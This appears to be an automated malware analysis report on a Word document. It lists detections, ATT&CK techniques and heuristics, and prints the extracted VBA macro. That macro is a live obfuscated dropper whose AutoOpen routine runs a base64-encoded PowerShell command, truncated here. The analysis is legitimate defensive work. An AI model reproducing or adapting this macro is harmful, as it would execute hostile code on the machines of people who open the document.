Verdict: MALICIOUS
Risk score: 242
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function that calls the Shell() function. This indicates the macro is designed to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection and multiple VBA heuristic firings confirm its malicious nature.
Heuristics (7)
- ClamAV: Doc.Malware.Valyria-6884775-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6884775-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12060 bytes |

SHA-256 of macros.bas: a634173f7e9323da9bcda05e24ec0e3c574b83bfb4e3e6abd095f05a32cd623a

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "FCWHLowuhS"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function IwmLQYzjw()
On Error Resume Next
For iSMzR = YYYoKM To drfmDk
For wVsJvX = rLBwV To 29841
uAwOZ = (3309 / CBool(czQEij) - ZZvjoc / Oct(42764 / Hex(24791) / CBtjhN + Rnd(pozOi / Fix(37))))
Next
jYdiBU = 47955 - 53461
Next
For RrRRl = Sjmwh To tMfSPP
For bPjRL = pWCGbC To 76835
zjCRPb = (33140 / CBool(HKQBQ) - MzQlEz / Oct(1401 / Hex(80441) / ZFjvjP + Rnd(Lwtcwd / Fix(37))))
Next
BAoIDH = 42413 - 2567
Next
IwmLQYzjw = pqzZFaniPu + Shell(XQSTC + Chr(wlzAz + vbKeyP + TdKCWaqYuwB) + "owers" + svfBDnAPGfM + nIczik + CtoLjcJqoL + umwMNiNXN + PEKJv + fUNKDmHphqP, 50726 - 50726)
For SzKEp = zozHwc To jfhHh
For UHotjU = lPqzi To 28649
vQwZK = (70730 / CBool(wFioi) - pUJav / Oct(51178 / Hex(43603) / DiGbkb + Rnd(hzAZj / Fix(37))))
Next
PPjIz = 93075 - 57705
Next
End Function
Sub Autoopen()
On Error Resume Next
For CJEET = RGQBH To rsmpza
For QQHiP = wZEaSw To 58103
KAUBWQ = (3590 / CBool(bhzRrN) - ctKXm / Oct(25208 / Hex(11153) / ipKXzM + Rnd(wDdzjr / Fix(37))))
Next
obJHd = 79121 - 49381
Next
IwmLQYzjw
For zCjCcj = arfEF To LMtCau
For wosjfK = jNijQ To 40798
rHozkz = (82390 / CBool(lTblbc) - QFDuq / Oct(67423 / Hex(16672) / CWRcX + Rnd(Mwokq / Fix(37))))
Next
EFFpv = 86179 - 38706
Next
End Sub
Attribute VB_Name = "YEuicVz"
Function svfBDnAPGfM()
On Error Resume Next
For IkKiR = nQKQr To ISJilj
For pzisuH = NnoCq To 67518
PuvEX = (68271 / CBool(BwKYuc) - zQhRF / Oct(91292 / Hex(98871) / isPaA + Rnd(zbHZIh / Fix(37))))
Next
XNdOzC = 77630 - 6823
Next
hdJQzb = "HeLL -e KAAgAG4" + "AZQB3AC0AbwBiAE" + "oAZQBDAFQAIABp" + "AE8ALgBDAG" + "8AbQBQA" + "HIARQBzAFMAS" + "QBvAG4ALgBEA" + "GUAZgBsAGEAdABl" + "AFMAVAByA" + "GUA"
For TAiON = HllnL To QDowj
For BUCwlv = bCDDF To 86251
AKYPw = (73568 / CBool(cUWnUV) - HKoRQU / Oct(74589 / Hex(67467) / UOiDl + Rnd(DhfuA / Fix(37))))
Next
FiZAw = 7990 - 48351
Next
VOozGpJ = "YQBNACg" + "AWwBpAG8ALgBNA" + "EUAbQBPAHIAeQ" + "BzAHQAUgBlA" + "EEAbQBdAFs" + "AYwBPAG4AdgBlA" + "FIAdABdAD" + "oAOgBm" + "AHIATw"
For fLRZi = sOlpY To RtDAN
For sIQpHZ = UBfPR To 37642
NjlJz = (17189 / CBool(Rbpvq) - cuMaY / Oct(75356 / Hex(26667) / QjqDr + Rnd(JSMzU / Fix(37))))
Next
IKiIu = 6483 - 8418
Next
zHzKtqlnjK = "BNAEIAQQBz" + "AGUANgA0AFMAVA" + "ByAG" + "kAbg" + "BHACgAIAAnAFYAW" + "gB" + "CAH"
For ajbtR = tapFq To FEwzuG
For EOwOp = UMRMEj To 41476
DkkIwl = (76321 / CBool(jdHJq) - ENiNo / Oct(95281 / Hex(99740) / cRlTwq + Rnd(NkZUvC / Fix(37))))
Next
MrzUS = 87629 - 59881
Next
mVARHQcU = "QAUwA4AE4A" + "QQBEAE0AZQA" + "vAHkAc" + "gAwAG" + "8AdABN" + "AFAAdAB" + "qAGoAbQB"
For HjjEI = iqsYi To ISWdp
For iWsiov = lArPT To 60408
QGKEj = (85127 / CBool(YjtjwM) - KuUTiV / Oct(20599 / Hex(17034) / ZsnqWC + Rnd(bYscsB / Fix(37))))
Next
RuwOK = 74684 - 98151
Next
jowAJR = "mAHMA" + "QQBnACsAbwA0AD" + "QATgB" + "wA"
For rjUaG = woKvH To kMvBLV
For SIEjBJ = CZiHAW To 56555
AEWww = (31538 / CBool(jihkXX) - zvCoq / Oct(61976 / Hex(85212) / ASRTTW + Rnd(CvlAM / Fix(37))))
Next
rfPZj = 76783 - 49062
Next
LkChSPa = "GMA" + "cQBtAEMAS" + "ABLADkAWgB0AHQA" + "dAAxADAAdgBYAG" + "kAK" + "wBzAGUAMgBI"
svfBDnAPGfM = hdJQzb + VOozGpJ + zHzKtqlnjK + mVARHQcU + jowAJR + LkChSPa
End Function
Function nIczik()
On Error Resume Next
For CQlPw = mFLfzj To EDfdw
For cflzW = rHPmP To 19582
SSzBfD = (41525 / CBool(UzjFDf) - nbkwj / Oct(61268 / Hex(94527) / QROEGS + Rnd(SwVEN / Fix(37))))
Next
GBzZbL = 16042 - 65379
Next
CKYSzAoi = "AGYAMwAxAEs" + "AcgA0AEoAcABE" + "ADgAawB2" + "AHoAegBUADcA" + "QQB3AEoA" + "cAArAHoA" + "RQAyAGEAaA" + "BhA"
For tSfrU = CS
... (truncated)